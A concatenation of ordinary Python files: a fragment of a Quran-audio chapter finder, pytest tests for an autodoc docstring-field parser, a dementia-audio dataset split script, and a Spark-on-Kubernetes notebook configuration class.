expected += self.EXAMINE_DURATION
increasing = True
if(maxTests == 0):
print("max tests of 15 exceeded, we will break in current expected value")
break
return locations[0], expected, False
def findOnPage(self, filePath, duration, bestAya, expected, increasing, chapterIndex):
'''
adjuts @param:expected value in page to more close to the first aya in the @param:chapterIndex
'''
# start with big shift and every time increasing changes, decrease the shift value
currentAya = bestAya['index']
currentSura = bestAya['sura']
shift = self.EXAMINE_DURATION
maxTests = 15
print("sura, aya:", currentSura, currentAya, "and shift=", shift, "we are in", expected)
while(not (currentSura == chapterIndex and currentAya >= 1 and currentAya <= chaptersMaxAya[chapterIndex - 1])):
maxTests -= 1
if(maxTests < 0):
print("max tests of 15 exceeded, we will break in current expected value")
break
if(currentSura < chapterIndex): # previous sura
expected += shift
if(not increasing): # toggling event
shift /= 1.5
shift = max(shift, 1)
increasing = True
else: # next sura or same sura but current aya is far away
expected -= shift
if(increasing): # toggling event
shift /= 1.5
shift = max(shift, 1)
increasing = False
approximatedText = self.asr.recognizeGoogle(filePath, expected, duration)
if(not approximatedText):
print("ASR returns None @findOnPage")
break
results, locations = self.searchEngine.search(approximatedText, limit=1) # TODO: narrow down the search documents here
if(len(results) == 0 or len(locations) == 0):
expected += shift if increasing else -shift
continue
bestAya = locations[0]
currentAya = bestAya['index']
currentSura = bestAya['sura']
print("sura, aya:", currentSura, currentAya, "and shift=", shift, "we are in", expected)
return bestAya, expected
# this is because first 3 ayat of a chapter may be so long or so short. so we want a dynamic mapping that
# tell the first 3 sentences of each chapter ends in which aya index
chaptersMaxAya = [ # index is chapter index in zero based.. value is max aya index that gives 3 sentences
4, 3, 3, 1, 1, 1, 2, 1, 2, 2, 3, 3, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
]
if __name__ == "__main__":
finder = Finder()
chapters = finder.find("C:\\Data\\القران كامل\\4\\ZOOM0002.WAV", 64, 1541)
print(chapters) |
# Copyright 2018 Luddite Labs Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from autodoc.python.rst.transforms.collect_fields import CollectInfoFields
from autodoc.report import Codes
# These param will be loaded by the fixtures (assert_py_doc, parse_py_doc).
docstring_transforms = [CollectInfoFields]
# Test: convert :param: and :type: to <param_field> and move them to the
# doc parts.
class TestParamField:
# Test: parameters and their types.
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type with_separate_type: string
:type non_exist: str
:param underscore_name_: Such name parsed as ``<reference>_`` RST
construction. But we should handle it as a plain text.
This is a paragraph after the field list.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('params')
assert section is not None
assert len(section) == 5
# Parameter no_type.
param = section[0]
assert param.get('name') == 'no_type'
assert param.get('type') is None
assert param.get('orig_field_tag') == 'param'
assert len(param) == 1
assert len(param[0]) == 1
assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
# Parameter type_wrong_place.
param = section[1]
assert param.get('name') == 'type_wrong_place'
assert param.get('type') == ['xxx']
assert param.get('orig_field_tag') == 'param'
assert len(param) == 1
assert len(param[0]) == 1
# Parameter with_type.
param = section[2]
assert param.get('name') == 'with_type'
assert param.get('type') == ['str']
assert param.get('orig_field_tag') == 'param'
assert len(param) == 1
assert len(param[0]) == 1
# Parameter with_separate_type.
param = section[3]
assert param.get('name') == 'with_separate_type'
assert param.get('type') == ['integer or None', 'string']
assert param.get('orig_field_tag') == 'parameter'
assert len(param) == 1
assert len(param[0]) == 2
# Parameter underscore_name_.
param = section[4]
assert param.get('name') == 'underscore_name_'
assert param.get('type') is None
assert param.get('orig_field_tag') == 'param'
assert len(param) == 1
assert len(param[0]) == 1
# Test: report messages.
def test_report(self, parse_py_doc):
env = parse_py_doc(
add_report=True,
text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type with_separate_type: string
:type non_exist: str
:type: str
:type with_separate_type: yyy
:param xxx: 123
:type xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 5
for i, item in enumerate(report):
assert len(item) == 8, 'Report at %d.' % i
report.sort()
path, domain, line, col, func_name, level, code, msg = report[0]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.COMPLEX
assert msg == 'Type specification is too complex [:type xxx:]'
path, domain, line, col, func_name, level, code, msg = report[1]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.DUPLICATE
assert msg == 'Duplicate field [:param no_type:]'
# This check happens before line 16 checks.
path, domain, line, col, func_name, level, code, msg = report[2]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:parameter:]'
path, domain, line, col, func_name, level, code, msg = report[3]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:type:]'
path, domain, line, col, func_name, level, code, msg = report[4]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.UNKNOWN
assert msg == 'Type for unknown parameter [non_exist]'
# Test: remove detected and invalid fields
def test_remove(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type non_exist: str
:type: str
:type with_separate_type: yyy
:param xxx: 123
:type xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
""",
expected="""This is an ordinary paragraph."""
)
# Test: if specify type fields without params ones, then it will not create
# params field section.
# See CollectInfoFields.after_process().
def test_wrong_section(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:type noparam: xxx
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 1
for i, item in enumerate(report):
assert len(item) == 8, 'Report at %d.' % i
report.sort()
path, domain, line, col, func_name, level, code, msg = report[0]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert func_name == 'test_func'
assert level == logging.INFO
assert code == Codes.UNKNOWN
assert msg == 'Type for unknown parameter [noparam]'
# Test: :ivar:, :vartype:.
class TestVarField:
# Test: parameters and their types.
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:ivar:
:vartype type_wrong_place: xxx
:ivar no_type: Lorem ipsum dolor sit amet.
:ivar type_wrong_place: 123
:ivar str with_type: 321
:ivar with_separate_type: Ut enim ad minim veniam,
:vartype with_separate_type: integer or None
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('attributes')
assert section is not None
assert len(section) == 4
# Parameter no_type.
param = section[0]
assert param.get('name') == 'no_type'
assert param.get('type') is None
assert param.get('orig_field_tag') == 'ivar'
assert len(param) == 1
assert len(param[0]) == 1
assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
# Parameter type_wrong_place.
param = section[1]
assert param.get('name') == 'type_wrong_place'
assert param.get('type') == ['xxx']
assert param.get('orig_field_tag') == 'ivar'
assert len(param) == 1
assert len(param[0]) == 1
# Parameter with_type.
param = section[2]
assert param.get('name') == 'with_type'
assert param.get('type') == ['str']
assert param.get('orig_field_tag') == 'ivar'
assert len(param) == 1
assert len(param[0]) == 1
assert param[0][0].astext() == '321'
# Parameter with_separate_type.
param = section[3]
assert param.get('name') == 'with_separate_type'
assert param.get('type') == ['integer or None']
assert param.get('orig_field_tag') == 'ivar'
assert len(param) == 1
assert len(param[0]) == 1
# Test: convert :keyword: and :kwtype: to <keyword_field> and move them to the
# doc parts.
class TestKwField:
# Test: parameters and their types.
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
This is a paragraph after the field list.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('keyword')
assert section is not None
assert len(section) == 4
# Parameter no_type.
param = section[0]
assert param.get('name') == 'no_type'
assert param.get('type') is None
assert param.get('orig_field_tag') == 'keyword'
assert len(param) == 1
assert len(param[0]) == 1
assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
# Parameter type_wrong_place.
param = section[1]
assert param.get('name') == 'type_wrong_place'
assert param.get('type') == ['xxx']
assert param.get('orig_field_tag') == 'keyword'
assert len(param) == 1
assert len(param[0]) == 1
# Parameter with_type.
param = section[2]
assert param.get('name') == 'with_type'
assert param.get('type') == ['str']
assert param.get('orig_field_tag') == 'keyword'
assert len(param) == 1
assert len(param[0]) == 1
# Parameter with_separate_type.
param = section[3]
assert param.get('name') == 'with_separate_type'
assert param.get('type') == ['integer or None', 'string']
assert param.get('orig_field_tag') == 'keyword'
assert len(param) == 1
assert len(param[0]) == 2
# Test: report messages.
def test_report(self, parse_py_doc):
env = parse_py_doc(
add_report=True,
text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
:kwtype: str
:kwtype with_separate_type: yyy
:keyword xxx: 123
:kwtype xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 5
for i, item in enumerate(report):
assert len(item) == 8, 'Report at %d.' % i
report.sort()
path, domain, line, col, ref_name, level, code, msg = report[0]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.COMPLEX
assert msg == 'Type specification is too complex [:kwtype xxx:]'
path, domain, line, col, ref_name, level, code, msg = report[1]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.DUPLICATE
assert msg == 'Duplicate field [:keyword no_type:]'
# This check happens before line 16 checks.
path, domain, line, col, ref_name, level, code, msg = report[2]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:keyword:]'
path, domain, line, col, ref_name, level, code, msg = report[3]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:kwtype:]'
path, domain, line, col, ref_name, level, code, msg = report[4]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.UNKNOWN
assert msg == 'Type for unknown parameter [non_exist]'
# Test: remove detected and invalid fields
def test_remove(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
:kwtype: str
:kwtype with_separate_type: yyy
:keyword xxx: 123
:kwtype xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
""",
expected="""This is an ordinary paragraph."""
)
# Test: convert :return: and :rtype: to <returns_field> and move them to the
# doc parts.
class TestReturnField:
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:return bla bla: Hz
:returns: the message id 1
:return: the message id 2
:rtype: int
:rtype: char
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('returns')
assert section is not None
assert len(section) == 3
ret = section[0]
assert ret.get('type') is None
assert ret.get('orig_field_tag') == 'returns'
assert len(ret) == 1
assert len(ret[0]) == 1
assert ret[0][0].astext() == 'the message id 1'
ret = section[1]
assert ret.get('type') == ['int']
assert ret.get('orig_field_tag') == 'return'
assert len(ret) == 1
assert len(ret[0]) == 1
assert ret[0][0].astext() == 'the message id 2'
ret = section[2]
assert ret.get('type') == ['char']
assert ret.get('orig_field_tag') == 'returns'
assert len(ret) == 1
assert len(ret[0]) == 0
# Test: report messages.
def test_report(self, parse_py_doc):
env = parse_py_doc(
add_report=True,
text="""
This is an ordinary paragraph.
:return bla bla: Hz
:return: the message id 2
:return:
:rtype: int, :obj:`my`
:rtype: char
:rtype bla: char
:rtype: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:rtype: Line 1
Line 2.
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 5
for i, item in enumerate(report):
assert len(item) == 8, 'Report at %d.' % i
path, domain, line, col, ref_name, level, code, msg = report[0]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:return:]'
path, domain, line, col, ref_name, level, code, msg = report[1]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.EMPTY
assert msg == 'Empty content [:return:]'
path, domain, line, col, ref_name, level, code, msg = report[2]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:rtype:]'
path, domain, line, col, ref_name, level, code, msg = report[3]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.COMPLEX
assert msg == 'Type specification is too complex [:rtype:]'
path, domain, line, col, ref_name, level, code, msg = report[4]
assert path == '<string>'
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.COMPLEX
assert msg == 'Type specification is too complex [:rtype:]'
# Test: remove detected and invalid fields
def test_remove(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:return bla bla: Hz
:return: the message id 2
:return:
:rtype: int
:rtype: char
:rtype bla: char
:rtype: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
Ut enim ad minim veniam, quis nostrud.
""",
expected="""
This is an ordinary paragraph.
Ut enim ad minim veniam, quis nostrud.
"""
)
# Test: convert :raises: rtype: to <raises_field> and move them to the
# doc parts.
class TestRaisesField:
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:raises:
:raises ValueError: if the message_body exceeds 160
:raise TypeError: if the message_body is not a basestring
:except RuntimeError:
:exception RuntimeError2:
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('raises')
assert section is not None
assert len(section) == 4
node = section[0]
assert node.get('type') == ['ValueError']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'if the message_body exceeds 160'
node = section[1]
assert node.get('type') == ['TypeError']
assert node.get('orig_field_tag') == 'raise'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'if the message_body is not a basestring'
node = section[2]
assert node.get('type') == ['RuntimeError']
assert node.get('orig_field_tag') == 'except'
assert len(node) == 1
assert len(node[0]) == 0
node = section[3]
assert node.get('type') == ['RuntimeError2']
assert node.get('orig_field_tag') == 'exception'
assert len(node) == 1
assert len(node[0]) == 0
# Test: if :raises: contains multiple types (:raises Type1 Type2:) then
# generate multiple :raises: fields with single type.
def test_multiple(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:raises RuntimeError1 RuntimeError2: Generate multiple fields.
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('raises')
assert section is not None
assert len(section) == 2
node = section[0]
assert node.get('type') == ['RuntimeError1']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'Generate multiple fields.'
node = section[1]
assert node.get('type') == ['RuntimeError2']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'Generate multiple fields.'
def test_report(self, parse_py_doc):
env = parse_py_doc(
add_report=True,
text="""
This is an ordinary paragraph.
:raises:
:raises ValueError: if the message_body exceeds 160
:raise TypeError: if the message_body is not a basestring
:except RuntimeError:
:exception RuntimeError2:
:raises RuntimeError1 RuntimeError2: this is incorrect!
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 3
assert len(report[0]) == 8
path, domain, line, col, ref_name, level, code, msg = report[0]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.MISSING
assert msg == 'Type is missing [:raises:]'
path, domain, line, col, ref_name, level, code, msg = report[1]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.MISSING
assert msg == 'Description is missing [:raises:]'
path, domain, line, col, ref_name, level, code, msg = report[2]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:raises:]'
# Test: remove detected and invalid fields.
def test_remove(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:raises:
:raises ValueError: if the message_body exceeds 160
:raise TypeError: if the message_body is not a basestring
:except RuntimeError:
:exception RuntimeError2:
:one:
Ut enim ad minim veniam, quis nostrud.
""",
expected="""
This is an ordinary paragraph.
:one:
Ut enim ad minim veniam, quis nostrud.
"""
)
# Test: convert :Yields: <yields_field> and move them to the doc parts.
class TestYieldsField:
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:Yields: Quis nostrud exercitation ullamco. In voluptate velit esse
cillum dolore eu fugiat nulla.
Ut enim ad minim veniam.
:Yields: 123
:Yields:
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('yields')
assert section is not None
# NOTE: empty :Yields: will be dropped.
assert len(section) == 2
node = section[0]
assert node.get('orig_field_tag') == 'Yields'
assert len(node) == 1
assert len(node[0]) == 2
assert node[0].astext() == ('Quis nostrud exercitation ullamco. '
'In voluptate velit esse\ncillum '
'dolore eu fugiat nulla.\n\nUt enim '
'ad minim veniam.')
node = section[1]
assert node.get('orig_field_tag') == 'Yields'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0].astext() == '123'
# Test: remove detected fields.
def test_remove(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:Yields: Quis nostrud exercitation ullamco. In voluptate velit esse
cillum dolore eu fugiat nulla.
Ut enim ad minim veniam.
:Yields: 123
:Yields:
Ut enim ad minim veniam, quis nostrud.
""",
expected="""
This is an ordinary paragraph.
Ut enim ad minim veniam, quis nostrud.
"""
)
def test_report(self, parse_py_doc):
env = parse_py_doc(
add_report=True,
text="""
This is an ordinary paragraph.
:Yields: 123
:Yields:
:Yields 23: sds
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
report = env.get('reporter').report
assert isinstance(report, list)
assert len(report) == 2
assert len(report[0]) == 8
path, domain, line, col, ref_name, level, code, msg = report[0]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.MISSING
assert msg == 'Content is missing [:Yields:]'
path, domain, line, col, ref_name, level, code, msg = report[1]
assert path == '<string>' # conftest setup this.
assert domain == 'python'
# NOTE: currently we drop position in the docstring
# and use position of the ref (function, class).
assert line == 0
assert col == 0
assert ref_name == 'test_func'
assert level == logging.INFO
assert code == Codes.INCORRECT
assert msg == 'Incorrect signature [:Yields:]'
|
<reponame>jvel07/ast
# -*- coding: utf-8 -*-
# @Time : 10/19/20 5:15 AM
# @Author : <NAME>
# @Affiliation : Massachusetts Institute of Technology
# @Email : <EMAIL>
# @File : prep_esc50.py
import numpy as np
import json
import os
import zipfile
import pandas as pd
import wget
# label = np.loadtxt('/data/sls/scratch/yuangong/aed-pc/src/utilities/esc50_label.csv', delimiter=',', dtype='str')
# f = open("/data/sls/scratch/yuangong/aed-pc/src/utilities/esc_class_labels_indices.csv", "w")
# f.write("index,mid,display_name\n")
#
# label_set = []
# idx = 0
# for j in range(0, 5):
# for i in range(0, 10):
# cur_label = label[i][j]
# cur_label = cur_label.split(' ')
# cur_label = "_".join(cur_label)
# cur_label = cur_label.lower()
# label_set.append(cur_label)
# f.write(str(idx)+',/m/07rwj'+str(idx).zfill(2)+',\"'+cur_label+'\"\n')
# idx += 1
# f.close()
#
from sklearn.model_selection import train_test_split, StratifiedKFold
def get_immediate_subdirectories(a_dir):
return [name for name in os.listdir(a_dir) if os.path.isdir(os.path.join(a_dir, name))]
def get_immediate_files(a_dir):
return [name for name in os.listdir(a_dir) if os.path.isfile(os.path.join(a_dir, name))]
# label_set = np.loadtxt('./data/dementia_class_labels_indices.csv', delimiter=',', dtype='str')
# label_map = {}
# for i in range(1, len(label_set)):
# label_map[eval(label_set[i][2])] = label_set[i][0]
# print(label_map)
# label_map = {'1': 'alzheimer', '2': 'mci', '3': 'hc'}
# fix bug: generate an empty directory to save json files
if os.path.exists('./data/datafiles') == False:
os.mkdir('./data/datafiles')
base_path_16k = '/home/egasj/data/audio/demencia94B-wav16k'
meta = pd.read_csv('dementia_meta.csv')
X = meta.loc[:, 'folder':'filename']
y = meta['label']
skf = StratifiedKFold(n_splits=5)
for idx, (train_idx, test_idx) in enumerate(skf.split(X, y), start=1):
X_train, X_test = X.iloc[train_idx], X.iloc[test_idx]
y_train, y_test = y.iloc[train_idx], y.iloc[test_idx]
X_train['label'] = y_train
X_test['label'] = y_test
train = X_train.values.tolist()
test = X_test.values.tolist()
train_wav_list = []
eval_wav_list = []
for val in train:
cur_dict = {"wav": os.path.join(base_path_16k, val[1]), "labels": '/m/21rwj' + str(val[2]).zfill(2)}
train_wav_list.append(cur_dict)
for val in test:
cur_dict = {"wav": os.path.join(base_path_16k, val[1]), "labels": '/m/21rwj' + str(val[2]).zfill(2)}
eval_wav_list.append(cur_dict)
with open('./data/datafiles/dementia_train_data_' + str(idx) + '.json', 'w') as f:
json.dump({'data': train_wav_list}, f, indent=1)
with open('./data/datafiles/dementia_eval_data_' + str(idx) + '.json', 'w') as f:
json.dump({'data': eval_wav_list}, f, indent=1)
tot = train + test
total_data = []
for val in tot:
cur_dict = {"wav": os.path.join(base_path_16k, val[1]), "labels": '/m/21rwj' + str(val[2]).zfill(2)}
total_data.append(cur_dict)
with open('data/dementia_total_data.json', 'w') as f:
json.dump({'data': total_data}, f, indent=1)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, subprocess, shutil, sys, uuid, time, base64
from pyspark import SparkConf, SparkContext
from string import Formatter
import socket
try:
from kubernetes import config, client
from kubernetes.client.rest import ApiException
except ImportError:
pass
class SparkConfigurationFactory:
def __init__(self, connector):
self.connector = connector
def create(self):
cluster_name = os.environ.get('SPARK_CLUSTER_NAME', 'local')
# Define configuration based on cluster type
if cluster_name == 'local':
# local
return SparkLocalConfiguration(self.connector, cluster_name)
class SparkConfiguration(object):
def __init__(self, connector, cluster_name):
self.cluster_name = cluster_name
self.connector = connector
def get_cluster_name(self):
""" Get cluster name """
return self.cluster_name
def get_spark_memory(self):
""" Get spark max memory """
return os.environ.get('MAX_MEMORY', '2')
def get_spark_version(self):
""" Get spark version """
from pyspark import __version__ as spark_version
return spark_version
def get_spark_user(self):
""" Get cluster name """
return os.environ.get('SPARK_USER', '')
def get_spark_needs_auth(self):
""" Do not require auth if SPARK_AUTH_REQUIRED is 0,
e.g. in case HADOOP_TOKEN_FILE_LOCATION has been provided
"""
return os.environ.get('SPARK_AUTH_REQUIRED', 'false') == 'true'
def close_spark_session(self):
sc = self.connector.ipython.user_ns.get('sc')
if sc and isinstance(sc, SparkContext):
sc.stop()
def _parse_options(self, _opts):
""" Parse options and set defaults """
_options = {}
if 'options' in _opts:
for name, value in _opts['options'].items():
replaceable_values = {}
for _, variable, _, _ in Formatter().parse(value):
if variable is not None:
replaceable_values[variable] = os.environ.get(variable)
value = value.format(**replaceable_values)
_options[name] = value
return _options
def configure(self, opts, ports):
""" Initializes Spark configuration object """
# Check if there's already a conf variablex
# If using SparkMonitor, this is defined but is of type SparkConf
conf = SparkConf().setMaster("k8s://https://kubernetes:443")\
.setAppName("Notebook")\
.set("spark.executor.memory", "1g")\
.set("spark.executor.instances", "1")\
.set("spark.kubernetes.container.image", "dodasts/spark:v3.0.0")\
.set("spark.kubernetes.authenticate.driver.serviceAccountName","default")\
.set("spark.submit.deployMode", "client")\
.set('spark.extraListeners', 'sparkmonitor.listener.JupyterSparkMonitorListener')\
.set('spark.driver.extraClassPath', '/opt/conda/lib/python3.8/site-packages/sparkmonitor/listener.jar')\
.set('spark.driver.host', socket.gethostbyname(socket.getfqdn()))\
#.set("spark.hadoop.fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")\
#.set("spark.hadoop.fs.s3a.path.style.access", "true")\
#.set("spark.hadoop.fs.s3a.fast.upload", "true")
#.set("spark.hadoop.fs.s3a.endpoint", "<minio host>:31311")
#.set("spark.hadoop.fs.s3a.access.key", "admin")
#.set("spark.hadoop.fs.s3a.secret.key", "adminminio")
#.set("spark.hadoop.fs.s3a.fast.upload", "true")
#.set("spark.hadoop.fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")
options = self._parse_options(opts)
for name, value in options.items():
conf.set(name, value)
return conf
class SparkLocalConfiguration(SparkConfiguration):
def configure(self, opts, ports):
""" Initialize YARN configuration for Spark """
conf = super(self.__class__, self).configure(opts, ports)
return conf
def get_spark_session_config(self):
conn_config = {}
